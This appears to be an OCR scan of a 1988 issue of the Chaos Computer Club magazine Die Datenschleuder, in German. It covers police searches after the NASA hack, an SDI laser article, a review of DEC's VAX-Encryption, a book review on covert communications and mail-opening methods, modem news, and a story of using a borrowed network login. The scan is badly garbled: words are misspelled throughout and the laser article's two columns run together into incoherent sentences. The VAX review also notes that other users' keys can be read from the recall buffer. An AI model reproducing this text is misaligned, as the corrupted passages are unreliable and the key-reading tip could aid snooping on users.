Ergebnisse dieser Ermittlungen liegen 
derzeit noch nicht vor. Nach neuesten Infor¬ 
mationen sind an den Durchsuchungen der 
Privatwohnung in Hamburg-Harburg auch 
drei Beamte der Deutschen Bundespost be¬ 
teiligt. Sie interessieren sich lür Verstöße 
gegen das Fernmeldeanlagengesetz. 

Nachdem die Durchsuchungen gegen 12.00 
dem diensthabenden Leiter der Hackerseel¬ 
sorge bekannt wui'den, sind erste Ma߬ 
nahmen eingeleitet worden. Bereits gegen 
12.30 stand ein Mitarbeiter von Radio Ham¬ 
burg vor der Tür. Ein Durchsuchter gab erste 
Interviews.Auf die Stellungnahmen der an¬ 
deren Durchsuchten wird noch gewartet, 
Laut Hackerseelsorge habe inzwischen fast 
jederHackerdas Prädikat 'staatlichgeprüfter 
Hacker' erworben - eine Auszeichnung, die 
in der Szene einen hohen SteUenweri besitzt. 

Bei der jüngsten Hausdurchsuchung inHam- 
burg wurde ein selbstgebauter Akkusilkkop- 
pler, rund 25 Spieledisketten sowie diverse 
Programmaus drucke beschlagnahmt. Aus¬ 
serdem nahmen die Beamten die jüngste 
Ausgabe der CCC-eigenen Publikation Da¬ 
tenschleuder mit. 

Mitglieder des Chaos Computer Qubs sind 
angesichts der jüngsten Durchsuchungen 
eher enttäuscht. Wie Vorstandsmitglied Stef¬ 
fen Wemery erklärte, wurde Wochenvor der 
Veröffentlichung des NASA-Hacks der Ver¬ 
fassungsschutz informien, mit der Bitte, die 


iw 


^ic Sniensdjicuber 


Seite 3 




amerikanischen Geheimdienste über den 
schwerwiegenden Softwai-efehler m Kennt¬ 
nis zu setzen. Nach Angaben der Hacker 
woDte man mit dieser Inlormationspolitik au/ 
vorhandene Sicherheitsrisiken auimerksam 
machen. Nachdem sowolil die Digital Eciuip- 
ment Corporation (DEC) als betroffener 
System- und Netzhersteller als auch die be¬ 
troffenen wissenschaftlichen Institute in- 
fonniert waren, güig der Chaos Computer 
Club mit der Story an die Öffentlichkeit. Nach¬ 
dem die Wogen der Erregung abflauten, 
stellten die Computertreaks fest, das trotz 
ihrer Inlormationspolitik die Computer der 
NASA nach Wochen immer noch offen und 


die Sicherheitsmängel nicht beseitigt waren. 

Wie Reinhard Schruizki gegenüber der 
Fresse erklärte, zeige dei' Vorfall, wie wenig 
man sich auf die Sicherheitsbehörden verlas¬ 
sen könne . Man habe sich wirklich bemüht, 
eine Schadensbegrenzung einzuleiten. Jetzt 
w^irdmanvomBKAverlolgt. Schrutzki: 'Wer 
wirklich als Betroffener von Compmer- 
krutiin.ilität auf die Hilfe der Polizeibehörden 
angewiesen ist, der hat schlechte Karten. 


CÜMCH ; CPD 13880301 1903 


Bestellfeizchen 01/88 


3h SaimAiJdujJsAiii'iAvsmbsn 

Sozialabo lür Schüler pipapo DM 30,00 

Standardabo DM 60.00 

Förderabo ab DM120.00 

Mitgliedschaft im CCC e.V. für 1 Jahr 
Aufnahme-/\'erwaltungsgebühr DM 20.00 

Schüler, Studenten etc DM 60.00 

Otto-Normaluser DiM 120.00 

Fördermitglieder ab DM 240.00 


Die Hackerbibel Teil 1 


Paj'lacom - -Studie 


DM 33.33 


DM 7.50 


Der elektronische Kaimnerjäger DM 10.00 

Aufkleber 'Kabelsalat ist gesund , 
Superluxussonderausführung nüt 
unbeschränkter Haftung 3 Stück-Set 

DM 5.00 

Summe DM 

fölETc f ZltUAßJ 


Chaos Compixter Cbö 




program Personenbogen; 

uses CCC: 

begin 

readln(stfft,Voniaine); _ 

readln(stUt,Name); _ 

readln(stift,Sh'asse); _ 

readln(stift,Ori); _ 

if neues Mitglied then begin 

readlii(stilt,Telefon): _ 

readlnf Stift, Geburtsdatum); _ 

repeat 

readlnfstift, Zahlweise): 
until Zahlweise m [ bar v-scheck 
Überweisung ]; 
end; 
repeat 

readlnfStift. Zahlweisei: _ 

uniil Zahlweise in [ bar v-scheck 
Überweisung ]; 
bezahlen: 
eintüten; 
abschicken: 
end. 



Seite 4 


Stifcndifjlcuicr 


Ess Di Ai 


Lichtblilzezucken lautlos über dem Horizont von 
Capistrano. Hell aufleuchtend explodiert im sel¬ 
ben Augenblick eine Rakete, 

Ursache war der Lichtblitz einer chemisch ge- Nachrichten-Elektronik vordem gefürchteten elek- 
pumpten Wasserstoff-Flour Laserkanone. Licht ist tromagneti.schen Puls (EMP) zu schützen. Nocli ini- 
zur Waffe geworden. Dies ist nicht Science Fiction mer, so die Studie, könnten „einige Atomexplosio- 
cincr fremden Welt, sondern Alltag der Bewohner nen“ in großer Höhe gewaltige EMPs auslösen und 
des kalifornischen Badeortes San Juan Capistrano . das nachrichtentcchnischc Nervensystem zerstören. 
Seil 1977 werden hier Hochenergielaser in milim- Die Bemühungen der Milii.ärs die Informaiions- 
rischen Geheimprojekten als Sirahlenwaffen er- tcchnologien des C3I (Command-, Control-, 
forscht, und das nicht erst seit Reagans SDI-Plänen. Communication-Iniclligence) vor dem Chaos- 
Für das US-Navy Projekt „Sea Lite“, zur Strahlen- Faktor zu schützen, gelten den Wissenschaftlern 
Verteidigung von atomgetriebenen Flugzeugträgern, schon wegen des „unzureichenden Verständnisses“ 
testete die Firma TRW hier ihre chemischen Laser des EMP-Phänomens als nicht aussichtsreich. Die 
mit einer Leistung von mehr als zwei Megawatt. Im biologischen Konsequenzen eines EMP sind eben- 
Jahre 1981 erprobten die USA den MIRACL (Mid- falls noch unkalkulierbar. 

Infrared Advanced Chemical Laser). Dieser Laser 
hätte bei Leistungsteigerungen auf über zwanzig 
Megawatt die Potenz, sowjetische Atomraketen be¬ 
reits in der Startphase über Distanzen von mehreren 

tausend Kilometern zu vernichten. Das Ziel ist der Tellers nuklear gepumpter Röntgenlaser paßt somit 
Erfolg des „Alpha“-Projckis. Den chemischen Laser nicht in ein Konzept wie SDI. Heinar Kipphardt 
samt Treibstoff (H,F), Optik und Steuerungsrechner charakterisiert Edward Teller „In der Sache J. Robert 
so kompakt zu fertigen, daß er im Orbit stationiert Oppenheimer“ als einen Wissenschaftler der meint, 
werden kann. Das Projekt ist ein wesentliches Eie- „daß Entdeckungen weder gut noch böse sind, weder 
ment der strategischen Verteidugungsiniliative Prä- moralisch noch unmoralisch, sondern nur tatsäch- 
sident Reagans. lieh“. Teller ist überzeugt, „daß sie erst dann poli¬ 

tische Vernunft annehmen, wenn sie wirklich tief 
-■ erschrecken. Erst wenn die Bomben so groß sind, 

RÖntgonlaSSr und EMP daß sie alles vernichten können, werden sie das tun“, 

Bertold Brecht wertet die Einstellungen von Wis¬ 
senschaftlern mit den Worten seines Galilei: „Wer 
die Wahrheit nicht weiß, der ist bloß ein Dummkopf. 
Die Fletcher-Sludie des ehemaligen US- Aberwersieweißund.sieeineLiigenenni.deristein 
Weltraumchefs, James Flctcher, kam zu dem Er- Verbrecher. Wenn Wissenschaftler, eingeschUchtert 
gebnis, daß neue Technologien verfügbar werden, durch selbstsüchtige Machthaber, sich damit be- 
die einen Kraftakt der USA zur Verwirklichung der gnügen, Wissen um des Wissens willen aufzuhäu- 
Defensiv-Slrategie rechtfertigen. Initiator dieser fen, kann die Wissenschaft zum Krüppel gemacht 
neuen Technologien ist der als Vater der Wasser- werden, und eure neuen Maschinen mögen nur neue 
stoffbombe geltende Physiker Dr. Edward Teller. Drangsale bedeuten. Ihr mögt mit der Zeit alles 
Unter seiner Anleitung wird der Röntgenlaser ent- entdecken, was es zu entdecken gibt, und euer Fort¬ 
wickelt. Aus einer Höhe von 80 km über dem Erd- schritt wird doch nur ein Fortschreiten von der Men¬ 
boden soll der Röntgenlaser durch die Energie einer scheit weg sein. Die Kluft zwischen euch und ihr 
Atombombe gespeist, feindliche Raketen auf tau- kann eines Tages so groß werden, daß euer Jubel- 
sendc Kilometer Entfernung zerstören. Die .Ato- schrei Uber irgendeine neue Errungenschaft von 
mexplosion des Lasers wird neunmal stärker sein als einem universalen Entsetzensschrei beantwortet 
die Atombombe, welche auf Hiroshima fiel. werden könnte.“ 

Eine Studie des Pentagon kritisieit hingegen die 
Bemühungen des US-Militärs, Waffen und 

Salenärtjlciiäcr 


Se'rtB 5 



Keine Chance für Hacker..., 

VAX-Encryption '— 


Als in den ersten Januar Tagen der neue 
Software-Katalog von digital Equipment Cor¬ 
poration (DEC) in die Briefkästen der Kunden 
flatterte, bot sich auch das Software-Produkt 
VAX-Encryption zum Erwerb an. VAX- 
Encryption ist ein Software-Tool für die Ver¬ 
schlüsselung von Dateien zum Schutz gegen un¬ 
erwünschtes Lesen. 

VAX/VMS Encryption wurde nach den Ernplcli- 
lungcn der US-Normenbehörde National Buretui of 
Standards (NBS) entwickelt und erfüllt die Anfor¬ 
derungen des Data Encry ption Standard (DES). Die 
Verschlüsselung erfolgt nach dem ANSI DEA-1 
Algorithmus auf der Grundlage der FlPS-46 Spe¬ 
zifikation des NBS. Neben demCipher Block Chain 
Mode DESCBC ist sowohl der Electronic ('ode 
Book Mode DESECB als auch der 8- Bit Ciplicr 
Feedback Mode DESCFB anwendbar. 



Wünscht ein VAXA^MS Benutzer die Verschlüs¬ 
selung einer Datei, so geschieht dies direkt aus der 
Digital Command Language (DCL). Zuerst wird 
einmal der Encryption Key value definiert; 

$ ENCRYPT/CREATE-KEY KEYNAME "Key value'' 

Der Key value ist das Codewort nachdem der Al¬ 
gorithmus die Datei verschlüsselt. Das Codewort 
.sollte aus beliebig vielen Zahlen und Buchstaben 
bestehen, so z.B.: 



Dieses erfordert jedoch das SYSNAM-Privileg. 
Durch den Parameter /algorithmus= können die 
verschiedenen oben erklärten VerschlUsselungs- 
modes gewählt werden. Die Siandarteinstellung ist 
DESCBC. Dateien werden nun wir folgt ver¬ 
schlüsselt: 

S BNCRYPT FILENAME KEYNAME lAlso 30 : 


? ENCRYPT/CREATE-KEY GAGA "13 Affen haben 
71 Bananen gern" 

Encryption legt das Codewort wie folgt in der ei¬ 
genen Proccess-Table ab: 

ENCRYPTSKeySGAGA = "Verschlüsselter Key 
value" 

Systemweite Codewörter werden durch den Zu¬ 
satzparameter /SYSTEM in die SYSTEM-TABLE 
definiert und sind so für jeden Benutzer erreichbar. 


$ ENCRYPT FILENAME GAGA 

Flierdurch werden die gesamten Inhalte der Datei 
sowie separat gespeicherteZusatzinfoimationen wie 
Satzstruktur, ursprüngliches Erstellungsdatum und 
ursprünglicher Dateiname kodiert. Dies ist aller¬ 
dings nur der Fall, wenn mit dem Parameter /out- 
PUT=FiLENAME die gleiche Datei mit der gleichen 
Versionsnummer angesprochen wird, ansonsten 
wird eine völlig neue Datei erzeugt. Die Dateiattri¬ 
bute werden ebenso wie die ursprünglichen Da¬ 
teiinhalte bei der Entschlüsselung wiedcrhergestellt. 



Abbildung rechts: Schema der Verschlüsselung beim DES-Sysiem. Dabei bedeutet L die linke 
Blockhälfte. R die rechte BInckhälfte, als K: bis A',. sind die sechzehn Unterschlüs.tel bezeichnet, die 
aus dem Cesamtschlüssel abgeleitet werden, der aus S6 Dualzeichen besteht. Die Abkürzung f 
deutet den Verrechnungsprozeß an. (Nach G. Herrmann »Datensicherheil durch Verschlüsselung«. 
IBM 

©tttciipdiicBbcr 


Seite 6 


S TErP.YPT FILENAME KEYNÄME 

Der Eintrag des verschlüsselten Keyvalues i,-; die 
Proccess-Table wird durch dieses DCL Kommando 
gelö-scht: 

S ENCRYPT/REMOVE-KEY KEYNAME 

Zur Installiemng dieses Software-Produkts werden 
folgende Dateien benötigt: 

SYSSSHARE: EMCRYPSHR.EXE 85 BLOCK.S; 
SYS$SYSTEM; EHCRYPFAC. E.XE 16 BLOCKS; 
SYSSMANAGER: EWCRYPT-START.COM 3 BLOCKS; 

sowie die VMS-HELP-Library ENCRYPT.HLP, 
welche in das VMS-HELP integriert wird. 

Bedauerlich an diesem faszinierenden Software- 
Tool ist jedoch die Tats,iche, dass es für normal 
Sterbliche nicht zu haben ist. Schon die Prei.slistc des 
DEC-Katalogs verrät, daß dieses ,,Produkt nur im 
Rahmen von Projekten angeboten“ wird. 

Ein DEC-Vertreter bezog zu dieser Produktpolitik 
auf dem letzten DECUS-LUG Treffen in Flamburg 
Stellung; VAX-Encryption ist eine für das Militär 
gedachte Entwicklung, welche nicht in die Hände 
des Ostblocks fallen darf. Daher wacht der CIA über 
den Anwenderkreis dieses Tools. DEC ist ver¬ 
pflichtet nur Kunden mit ENCRYPT zu beliefern, 
die keine potentiellen Verbindungen in den Ostblock 
besitzen. 


Ein weiterer Grund ist laut DEC-Venreicr die Ge¬ 
fahr, daß Hacker mit VAX-Encryption Unsinn trei¬ 
ben könnten und die Sicherheit von Systemen und 
Daten beständen in Frage stellen würden. 

Sicherlich ist die Verschlüsselung von Daten nur so 
sicher, wie die Aufbewahrung des geheimen Schlüs¬ 
sels sicher ist. Aufgefallen ist bei VAX-Encryption, 
daßdas geheime Codewort zwar verschlüsselt in der 
Proccess-Table steht, jedoch auch in Klartext im 
Recall-Buffer zu finden ist. Für Hacker also kein 
Problem überden VMS S YS’lHM-ANALYSER die 
Codewörter anderer Benutzer in Erfahrung zu brin¬ 
gen. 

Sicherlich sollte DEC seinen Werbeslogan „Keine 
Chance für Hacker“ nochmal überdenken. 

S.Siahl 


CUNCHtDS-REDISrAIIU28.0I.88tII:SRI4ü65Z. 

Seite 7 


Im Zentrum der 
Spionage 



EinIcnSdjIcubcr 









Geheime Nachrichten-Technik 

Im Kampf um die Information 


Neu im Medienarchiv der DATENSCHLEUDER 
ist das „Handbuch für den privaten Nachrichten- 
Schutz“. „Nachrichtenwaffen“ prangt rot auf 
dem sch'vrzen Umschlag. Das Inhaltsverzeich¬ 
nis weist mehrere Symbole für den Schwierig¬ 
keitsgrad auf. Schließlich sind außer ailgeinein 
verständlichen Verfahren wie zwei Seiten all¬ 
tagstaugliche Geheimtinlenauflistung und Post- 
fallenbeschreibungen auch moderne mathema¬ 
tische Chiffrierverfahren erklärt. 

Die Privatstudie mit © by Reb Harbinger von 1986 
umfaßt gut 300 Seiten. Mengenmäßig wäre das - nur 
als Maß für die gegenwärtig verfügbare Datentech¬ 
nologie, keine Bestellungen bitte, da nicht vorhan¬ 
den -eine geschrumpft volle 720 Kilobyte-Diskette 
für die übliche kleine Tasche in Jacke oder Hemd 
(nicht auf die Daten setzen!). 


Ein Einleitungs-Abschnitt; 
„Die USA“ 


Der erste Absatz wird jetzt unverändert zitiert, da¬ 
nach werden verschiedene Informationen aus der 
Studie assoziativ aktualisiert: 

In den Vereinigten Staaten ist für die verschlü-sselte 
Datenübertragung im „privaten“ Bereich (z. B. für 
Banken) von Gesetz wegen das sog. „DES-System" 
(DataEncryptionSystem) vorgeschrieben. Es wurde 
von der Firma IBM, ursprünglich unter der Be¬ 
zeichnung ,J-ucifer“, entwickelt. 

Lucifer bezeichnet historisch den gefallenen Engel, 
der den Menschen das Licht (Erleuchtung'?) brachte. 
Die „National Security Agency“ (NSA) - der größte 
technische Nachrichtendienst der westlichen Welt, 
über den Leserinnen der oben genannten Privatstu¬ 
die im Selbstverlag weiteres erfahren können - hat 
die Annahme dieses Systems für den zivilen Si¬ 
cherheitsgebrauch durchgesetzt. So geschehen, weil 
das ,J)ES-Systcm“ noch unterhalb der Grenze der 
für die NSA überwindbaren liegt. 

DES verschlüsselt mittels eines 64 Bit-Blocks und 
benutzt vom Schlüssel 56 Bit. 

Auf dem Chaos Communication Congress Ende 
1987 dienten übliche Doraestos-Maschinen als Re- 
chenknechtc für das don vorgeführte in der BRD 
entwickelte DES-Programm. DES wurde dort nur 
als sicher in Verbindung mit einem zusätzlich ge¬ 


sicherten als Public Domain erhältlichem Daten¬ 
schrumpfprogramm erachtet. 

Bezeichnenderweise wurde es zu DES-Planungs- 
zeiten IBM untersagt, einen Computer mit einer 
längeren und damit noch schwieriger zu überwin¬ 
denden Schlüssellänge als 64 bit herzusiellen (ein 
128 bit Gerät lief im Versuch). Härle IBM .sich nicht 
an diese Auflage gehalten, der Export dieser Com¬ 
puter wäre untersagt worden, mit Hilfeder „ITAR“- 
Gesetze („International Traffic in Arms“), mit denen 
auch die Ausfuhr von Compulertechnologie und 
Software geregelt wird. 

Die Überlebensdauer von „DES“ scheint abgelau¬ 
fen, da Fachleute sie auch im kommerziellen Bereich 
mit Fünf, höchstens acht Jahren angeben. 
Vergleichsweise könnten schon entsprechend viele 
über Transputer europäischer Technologie ver- 
schaltete Heimcomputer von sonstwoher in den 
Gigaflop-Bereich dringen, der zu praktikabler DES- 
Analyse wohl benötigt würde. 

In früheren Jahren wurden sogarVeröffentlichungen 
über Entwicklungen von „sicheren“ Schlüsselsy¬ 
stemen - wie z. B, dem „Public Key“, von Hellman 
und Diffie - nach dem Kriegsgeräie-Kontrollgeseiz 
(„Munition Control Act“) zunächst von staatlicher 
Genehmigung abhängig gemacht. Inzwischen wur¬ 
den diese Bestimmungen gelockert, so daß dieses 
System im Vertragsdruck in der BR Deutschland 
ausführlich behandelt werden kann. 


Ein paar weitere Infos aus dem Werk 


... Am 1. Juli 1948 gab der Nationale Sicherheitsrat 
der USA mit seiner „Intelligence Directive“ 
(NSCID) die ersten Richtlinien für den gesamten 
Sicherheitsbereich heraus, in denen auch die Über¬ 
wachung aller derjenigen europäischen Nachrich¬ 
tenverbindungen festgelegt wurde, in denen si- 
cherheitsrelcvante Meldungen mit militärischem, 
politischem, wissenschaftlichem oder wirtschaftli¬ 
chem Inhalt enthalten sein „könnten“ („..which may 
concern information..“). 

... Durch die Unterschrift unter ein Codewort (einer 
muß es ja wissen) besiegelte am 24. Oktober 1952 
ein amerikanischer Präsident die „Geburtsurkunde“ 
der National Security Agency (NSA). 

...Sämtliche „Ziele“ der US Nachrichtenaufklärung 
sind aktuell in TEXTA, einer Art „Bibel“, vernetzt 

Seite 8 


erfaßt. 

...Lt. einiger hier zugänglicher Untersuchungen be¬ 
treibt jedoch „die Sowjetunion heute die größte 
Nachrichten-Aufklärungs-Organisation der Welt“. 
...Seit .Mitte der 70er Jahre sind brieftaschengroße 
Heimatfunkstellen im Einsatz, deren frequenzhüp¬ 
fenden Signale in örtlichen Radiosendungen der 
Gegenseite verborgen (sub cairier) und wieder her- 
ausgefiltert werden konnten und umgekehrt via Sa¬ 
tellit. 

...ln der BRD unterliegen Hersteller bei ihren Ent¬ 
wicklungen keinen Baubeschränkungen. Die In- 
landsUberwachung von Nachrichtenverbindungen 
wird über die Einrichtungen bei den Knotenämtern 
der Deutschen Bundespost durchgeführt (siehe auch 
das Kapitel „Postkontroße“). 

...In Österreich ist die Situation entspannter. Geräte 
zur Erzeugung von Schlüsseln der höchsten Si¬ 
cherheit werden produziert. 

...Die Schweiz stellt seit längerer Zeit Nachrich- 
lenhöchstsicherungsgeräie her. Zu Zeilen des 2. 
Weltkrieges gab es nur in der Schweiz keine Be¬ 
schränkungen für den Nachrichtenschiitz. Bitte sich 
vorzustellen: Die DDR als Demokratie nach 
Schweizer Vorbild bis 1990, 


Verschlüsseln mit Zettel und Stift 


Einen wichtigen Ausblick schildert der .'kutor: 
Schutzmaßnahmen im Privatbereich könnten so 
selbstverständlich wie das Verschließen eines Brie¬ 
fumschlages werden. Zu kurz kommt, daß für die 
neuen Datendienste fast jeder handelsübliche Com¬ 
puter entsprechende Sicherungsmöglichkeiten bie¬ 
tet. 

Die verschiedensten Verschlüsselungsverfahren mit 
Zettel und Stift werden vorgestellt. Die meisten sind 
zwar gut be.schrieben, aber recht kompliziert im 
Vergleich zu dem einfachen, im Buch „Im Zentrum 
der Spionage“ (ISBN 3-7758-1141-9) abgebildeten 
Verfahrendes MfS (DDR): die häufigen Buchstaben 
AEINRS werden durch eine einzige Ziffer (0..5) 

I dargestellt, die 6 steht für Code. Drei Ziffern nuu"- 
Ikieren einen Begriff der hundertstelligen Jargon- 
Liste und die anderen Zeichen werden durch zwei 
Ziffern dargcstclit. Die Zahlenverleilung zwischen 
ein-, zwei- und dreistelligen Zahlen bei der Schiüs- 
selvergabe sollte für Rauschen im Chi-Texi sorgen 
(siehe Abbildungen). 

Da die hundert häufigsten Wörter knapp die Hälfte 
eines Textes ausniachcii und die häufigsten Buch- 
stabendurch eineZifferdargestelltwerdcn, verkürzt 
und verschlüsselt dieses Verfahren zugleich. 

Seite 9 


Das modernste in der Studie für privaten Nach- 
richtenschutz geschilderte tcilautomatisicne Ver¬ 
fahren ist dagegen die Grundkonzeption eines Ver- 
schlUsselungsprogrammes mithilfe eines Taschen¬ 
rechners ab Generation TI 57. 

Ein PC oder HC mit Transputcr dran und die Nut¬ 
zung der Rechenkapazität zum Hufman-Coding 
oder der Schlüssclbildung aus vereinbarten Bit¬ 
würfelregionen von Mandelbrotzufällen u.a.m. feh¬ 
len. 

Aber die veraltete Mikropunktherstellung wird er¬ 
klärt. 

Die vom Ostblock ausgefühne Mikrat-Kamera ist 25 
mm kurz, 15 mm schmal und 5 mm flach. Die etwa 
2 mm starke (Öl-)Linse verkleinert bis 1:1000. Da¬ 
hinter die 15er Rundkassette. Das bringt gut be¬ 
leuchtete Objekte etwa im Meierabstand auf den 
knapp mm-grossen schwarzen Punkt. 

Hierzulande kann nach dem - fast traditionellen - 
ersten Schritt MTNOX-Verkleinerung von 8„*ir' 
auf 8*il mm mit handelsüblicher Mikrofilmtech¬ 
nologie (z. B. FUJI 850 Linien/mm) punktuell wei¬ 
terverkleinert werden. 

Zum Vergleich: Laserdrucker bieten derzeit theo¬ 
retisch 12 Linien/mm (300 dpi); oft ist der Toner 
grober (der SLM804 ist fein). Die besprochene Pri¬ 
vatstudie würde gerade noch lesbar im A6-Format 
auf 40 doppelseitig belaserte A4-Blätter passen. 
Auch groschengrosser Mehrfach-Druck ist möglich. 


Im Kapitel „Postüberwachung“ 
schließlich... 


...wird geschildert, wie es gemacht wird und was 
mensch dagegen tun kann. 

Neben den Trocken-Naß-Dampf-Öffnungsverfah- 
ren wird auch das einfache Abziehen und Wieder¬ 
aufkleben von als Postfalle aufgebrachten Klar¬ 
sichtklebestreifen mittels Tetrachlorkohlenstoff 
(scheitert bei dehn/reißbarem Matl-Acetatband) be¬ 
schrieben. Lehrreich sind geschilderte kleine 
Dienst-Pannen, wenn etwa im verpesteten sorgfältig 
wiederverschlosscncn Umschlag nur die Koiitroll- 
kopie lag und der Empfänger sich wunderte. 

Die Studie beschließt mit dem heiklen Thema 
„Längstwellen“. Gehirn-Manipulation vermittels 
langsam gepulster Funkwellen? 

Der Leiter der Forschungsabteilung am Pettis Me¬ 
morial Veterans Hospital in Kalifornien hatte Ver¬ 
suche mit einem aus der UdSSR stammenden 
„LIDA-Gerät“ durchgeführt. In der UdSSR wurde 
schon seit Jahren das „LIDA-Gerät“ zur „Ruhig- 
siellung von Patienten, anstelle von Tranquilizern, 

StaictiSdjlcubcr 




angewandt und dabei deren unerwünschte pharma¬ 
kologische Nebenwirkung vermieden.“ Die gepul¬ 
sten Radiowellen des „LIDA“ regen die elektro¬ 
magnetischen Gehirnströme an und rufen einen tran¬ 
ceähnlichen Zustand hervor. Lt. Gebrauchs.anlei- 
lung wird das Gerät in der UdSSR „zur Beruhigung 



bei Schlafstörungen und Spannungsruständen, so¬ 
wie bei neurotischem Fehlverhalten“ eingesetzt. 
Über starke niedrigfrequente Impuls-Sender ließen 
sich nichtoperative Ferneingriffe in die Gehim- 
struktur vornehmen („Surrogate lobotomies at long 
distance“), um Gruppenverhalten zu beeinflussen. 
Beschrieben werden hilfreiche Forschung und Nut¬ 
zung der Erkenntnisse auf der einen Seite und ge¬ 
warnt vor dem Mißbrauch „Geheimer Nachrich¬ 
tentechnik“. zum Nachteil der Freiheit der Men¬ 
schen unserer Zeit. 

In den vierseitigen Literaturhinweisen gibt es aus¬ 
reichend Stoff für Neugierigere. 

Die Studie für den privaten Nachrichtenschulz „ Ge¬ 
heime Nachrichtentechnik" ist mit 80 DM für „ nor¬ 
male " DV-Anwenderinnen nicht gerade billig, aber 
„Preis-Wert". Sollte sie im örtlichen DV-Klein¬ 
handel nicht erhältlich sein: Sie wird vertrieben von 
Utilisation Est, PF 856, FL-9490 Vaduz und 

beim Recon-Verlag, Postfach, 2000 Ham¬ 
burg 73. 

Wau 19.2.8822:35 

SntciiBHjIciiicc 


Mo(dem-Workshop auf dem CCC 87 

Entwicklung eines zulassungfähigen galvanisch 
gekoppelten Modems 

Der CCC plant, eine Arbeitsgruppe ins Leben zu 
rufen, die im Lauf des nä e h s ten Jahres bis zur 
engültigen Festlegung der Zulassungsbedingun¬ 
gen für teilnehmereigene Modems ein zulas¬ 
sungsfähiges, galvanisch gekoppeltes Modem 
entwickelt. 


Einladung [U 

an den 

Polizeipräsidenten 

Hamburg (ccc) - Der Chaos Computer Club hat 
am 23. Dezember 1987 den Hamburger Polizei¬ 
präsidenten in einem Telex zum Congress ein- 
geladen. Die Einladung im Wortlaut; 


Sehr geehrter Herr Präsident, 

wie Sie sicherlich aus der Presse erfahren haben, 
veranstaltet der Hamburger Chaos Computer Club 
e.V. auch in diesem Jahr seinen inzwischen tradi¬ 
tionellen Chaos Communication Congress im Ei- 
delstedter Bürgerhaus. Der Congress findet am 27. 
und 28. Dezember statt. 

Im Mittelpunkt der diesjährigen Veranstaltung steht 
unter anderem eine Bewertung des sogenannten 
NASA-Hacks. Wir möchten Sie aus Anlaß des Kon¬ 
gresses zu einem persönlichen Gespräch einladen, 
in dem es Gelegenheit gibt, über die Probleme der 
Computertechnik in verschiedenen Bereichen zu 
sprechen. Wir gehen davon aus, daß ein solches 
Gespräch für alle Beteiligten von Interesse ist. 

Für den Vorstand des Chaos Computer Club e.K, 
mit freundlichem Gruß 

Reinhard Schrutzki 


Geschenk-Abos gen Osten 

Nachdem die HACKERBIBEL Teil l (das Er¬ 
scheinen des zweiten Teils ist derzeit noch durch 
BKA-Fremdeinwirkungen behinden) schon seit 
Jahren in die DDR verschenkt werden darf, konnte 
der Verschenkdienst aktuell erweitert werden. 

Jetzt können auch komplette DATENSCHLEU- 
DER-Abos, bis Nummer xx sogar rückwirkend, 
formlos in die DDR verschenkt werden! 

Einfach die DDR-Empfängeradresse, ab welcher 
Nummer derDS-Versand gewünscht wird und einen 
entsprechenden Scheck (8 Ausgaben DM yy) schic¬ 
ken. HACKERBIBEL DM 33,33 extra. 
Auslandsaufschlag ist nicht erforderlich! 

Seite 10 


Galvanisch gekoppelt bedeutet, daß das Modem im 
Gegensatz zu einem Akustikkoppler elektrisch mit 
der Telefonleitung verbunden ist. Für dieses Modem 
soll eine Seriezulassung beantragt werden; die Fi¬ 
nanzierung derselben soll eventuell eine Zeitschrift 
übernehmen. Das Modem soll (von selbiger Zeit¬ 
schrift) als Bausatz ausgeliefert und dann zur End¬ 
kontrolle nach Hamburg geschickt werden. In Ham¬ 
burg wird beim CCC getestet, ob das Modem der 
Serienzulassung entspricht, und mit dem FZZ- 
Aufkleber versehen. Die Käufer des Bausatzes sind 
also die .Eenigung“; der CCC übernimmt gegen 
geringe Gebühr lediglich die Endkontrolle. 

In den nächsten Wochen soll geprüft werden, ob ein 
solches Vorgehen rechtlich möglich ist. Die Kosten 
füreine Serienzulassung Hegen bei etwa 20.000 DM. 


Bitnapping Party V1.0 

Die Ermittlungen gegen Art d’Ameublement und 
Teile der Bielefelder Scene sind abgeschlossen. Das 
Verfahren wurde eingestellt, die Kosten werden von 
der Staatskasse getragen. Schadensersatzforderun¬ 
gen wegen der Beschlagnahme (=Anwaltskosten) 
werden ebenfalls von der S taatskasse getragen. Quot 
erat - nochmal - quod erat expectaum! 
CUNCItlCIIAOSIPADELUUNI07.02.88l22:43l324 Z. 


Kurzmeldung 

Während des letzten Pariser „Salon du Livre“ bildete 
sich eine Gruppe, die den Kampf gegen die Zensur 
aufnahm: „informel Renvoyons la censure“. Das 
er.ste Bulletin mit Nachrichten aus der nicht nur 
französischen Welt gewisser großer Brüder; 
Difpop, 14, rue de Nameuil, F 75015 Paris. 


Seite 11 


Dieser Betrag müßte von einer Firma oder Zeit- 
.schrift aufgebracht werden, die dafür die Ver¬ 
triebsrechte an den Modembausatz erhält. 


Modemminimalversion 


Die größten Probleme liegen bei der „Zulassungs¬ 
fähigkeit“ des Modems. Die Post wehrt sich mit 
Händen und Füßen gegen alles, was in dieser Rich¬ 
tung von privaten Anwendern unternommen wird. 
Die entgültigen Zulassungsbedingungen sind nicht 
bekannt, lediglich vorläufige Richtlinien sind ver¬ 
fügbar. Zunächst soll eine „Minimalversion“ des 
Modems entwickelt werden, die möglichst wenige 
Streitpunkte, die bei der Zulassung entstehen könn¬ 
ten (Hayes-Befehlssatz etc), streift. Sie soll zum 
legalen, kostenkUnstigen Betrieb einer Mailbox aus¬ 
reichen. 

Die Enwicklungszcit hängt im wesentlichen davon 
ab, wie schnell die rechtliche Lage und die Bedin¬ 
gungen für eine Zulassung vor dem Europäischen 
Gerichtshof und bei der Bundespost endgültig ge¬ 
klärt sind. TREIFKY 



S>n(cnSil)lc»ber 





EARN 

oder das Erste Außerirdische Regional Netz 


Vor einigen Wochen entdeckleich, daß an meiner 
Universität ein Anschluß an EARN existiert. Ein 
Bekannter lieh mir sein Login samt Passwort und 
los ging es. 

Als erstes stürzte ich mich auf das Terminal, eine 
Siemensanlage unter dem VM/CMS Betriebssy¬ 
stem. Nach demEinloggen tippte ich erstmal SETUP 
NETZE um das Netz zu aktivieren. Ab da begannen 
die Schwierigkeiten, Mein erster Befehl, den ich an 
den EARN-Knoten absendete war/signup Vorname 
Nachname. Damit meldet man sich bei DEARN als 
Benutzendes InterChat an. Nach meinem Handbuch 
hätte jetzt die Meldung kommen müssen, daß man 
sich freut, mich bei InterChat begrüßen zu dürfen. 
Darauf seelisch eingestellt, war die Meldung ’ You 
banned from this Rclay’ ein Schock. Unter Relay 
versteht man die einzelnen Knoten der Datennetze, 
die so aufgebaut sind wie EARN bzw. das US- 
Gegenstück BITNIC. 

Nach Anfragen beim Operator bekam ich zu hören, 
